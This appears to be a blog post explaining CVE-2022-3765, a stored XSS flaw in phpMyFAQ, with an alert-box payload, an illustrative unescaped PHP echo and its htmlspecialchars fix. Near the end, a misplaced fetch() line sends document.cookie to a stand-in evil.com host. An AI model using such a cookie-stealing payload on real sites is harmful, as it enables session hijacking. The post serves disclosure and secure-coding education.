In today’s digital landscape, the security of web applications is more important than ever. One common and potentially dangerous vulnerability is Cross-Site Scripting (XSS). This post takes a deep dive into CVE-2022-3765, a stored XSS flaw in the popular phpMyFAQ open-source FAQ management system before version 3.1.8. We’ll break down what went wrong, how it could be exploited, see code samples, and offer resources for further reading. If you run phpMyFAQ or build web applications, you should care about this one!

What is CVE-2022-3765?

CVE-2022-3765 is a security bug in the phpMyFAQ project. The vulnerability is classified as a stored Cross-Site Scripting (XSS) bug.

Stored XSS allows an attacker to save (or "store") malicious JavaScript code in parts of a web app that other users might visit—like FAQs, comments, or messages. When users load affected pages, their browsers execute the attacker’s code, potentially stealing login cookies, changing content, or doing anything the user can do in their session.

Where's the Bug?

Before version 3.1.8, phpMyFAQ did not properly sanitize user input in certain fields, like the question or answer fields in the FAQ management panel. An attacker could input JavaScript code, which would be displayed and executed when someone viewed that FAQ entry.

Step 1: Submit Malicious FAQ

An attacker creates a new FAQ entry (or edits an existing one), placing JavaScript into, say, the question field.

<script>alert('XSS by BadGuy!');</script>

This gets saved into the database as part of the FAQ.

Step 2: Another User Browses to the FAQ

When a real user (admin or visitor) navigates to the affected FAQ, the question field is shown as HTML. Since the input was not sanitized, the script tag runs in the context of their browser, displaying an alert—or, in a real attack, hijacking their session.

Here’s an oversimplified PHP code snippet to illustrate the problem (not the actual project code)

// Retrieve question from DB
$question = $db->fetch('SELECT question FROM faq WHERE id = ?', [$id]);

// Display on page (unsanitized!)
echo "<h2>$question</h2>";

If $question contains <script>...</script>, the browser executes it. The page should have used escaping or sanitation.

A Proper Fix

echo "<h2>" . htmlspecialchars($question, ENT_QUOTES, 'UTF-8') . "</h2>";

- GitHub Issue Report – phpMyFAQ XSS
- NVD Entry for CVE-2022-3765
- phpMyFAQ Changelog

`html

fetch('<a href="https://evil.com/steal?cookie=" rel="nofollow">https://evil.com/steal?cookie=</a>' + document.cookie)

Conclusion

CVE-2022-3765 is a textbook example of how dangerous stored XSS bugs are—and how easy it is for them to slip in if user input isn’t handled carefully. If you run phpMyFAQ, update *immediately* and review your own project for similar mistakes.

Stay sharp, stay updated, and always sanitize user input!

*This post is original content. For more vulnerabilities explained, follow this space!*

Timeline

Published on: 10/31/2022 11:15:00 UTC
Last modified on: 11/01/2022 17:37:00 UTC